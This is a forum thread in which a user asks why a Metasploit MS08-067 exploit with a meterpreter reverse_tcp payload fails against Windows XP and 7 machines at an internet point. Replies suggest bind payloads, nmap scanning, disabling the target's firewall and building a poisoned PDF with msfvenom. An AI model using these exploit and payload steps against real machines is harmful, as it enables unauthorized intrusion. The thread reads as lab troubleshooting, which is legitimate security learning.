If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

Hybrid View

Msfconsole i do not understand where the mistake

I have internet point and I have 4 computers with 1 xp and 3 with win7 so then copy the ip address i get home where i installed backtrack5. The open msfconsole and write "use windows/smb/ms08_067_netapi" "set PAYLOAD windows/meterpreter/reverse_tcp""set lhost my ip""set rhost ip victim"show targets and and choose sp 3 ita" exploit"
[*] Started reverse handler on 192.168.1.5:4444
[-] Exploit exception: The connection timed out (ip victim:445).[*] Exploit completed, but no session was created.

I did many tests also on another PC I have here in the LAN with win7 but if I remember correctly I always get
[*] Exploit completed, but no session was created.
It would be a very pleasant your help exscuse my english.

Re: Msfconsole i do not understand where the mistake

Originally Posted by Darkcomet

I have internet point and I have 4 computers with 1 xp and 3 with win7 so then copy the ip address i get home where i installed backtrack5. The open msfconsole and write "use windows/smb/ms08_067_netapi" "set PAYLOAD windows/meterpreter/reverse_tcp""set lhost my ip""set rhost ip victim"show targets and and choose sp 3 ita" exploit"
[*] Started reverse handler on 192.168.1.5:4444
[-] Exploit exception: The connection timed out (ip victim:445).[*] Exploit completed, but no session was created.

I did many tests also on another PC I have here in the LAN with win7 but if I remember correctly I always get
[*] Exploit completed, but no session was created.
It would be a very pleasant your help exscuse my english.

Try using bind_tcp and see if you're able to trigger the payload. Are you sure that port 445 is open? Try running

Code:

nmap -A -sS 192.168.1.5

. If the ports are open it could be the firewall preventing you from establishing a reverse connection.

Re: Msfconsole i do not understand where the mistake

You should check if that system is patched or not, disable firewall on Win XP and check if your target - service pack + language pack meets Metasploit module. Use "show targets" command to check. If its not there then create one, MS08_067 is a wonderful example why automatic exploitation tools fails against various service pack and various languages packs. Read detailed HDM description:

Re: I do not understand where the mistake

Are you fairly new to metasploit, or have you been working with it awhile? If you're a metasploit newbie, you may want to go through the metasploit unleashed tutorial over at Offensive Security--it's a great resource.

If you've been using MSF for awhile, try the following: install an old version of Adobe Reader on your XP target. Then, using msfvenom, build a poison pdf with an exploit targeting the vulnerable version of Adobe Reader. Run the poison pdf on your target, and see if you get a shell, meterpreter session, or whatever payload you encoded in the pdf.

If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

Re: I do not understand where the mistake

Not sure what you're saying, but it sounds like you're referring to pivoting (i.e. gaining control of an xp machine first, then going from that to win7). Do you have 2 targets you're trying to exploit (one PC that has xp, and one PC that has Win7)? If so, you may need to try a different exploit...based on what's installed on your target boxes. Metasploit has several exploits available for older versions of Adobe Reader; give one of those a try. You can use a process similar to what I described above.

If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...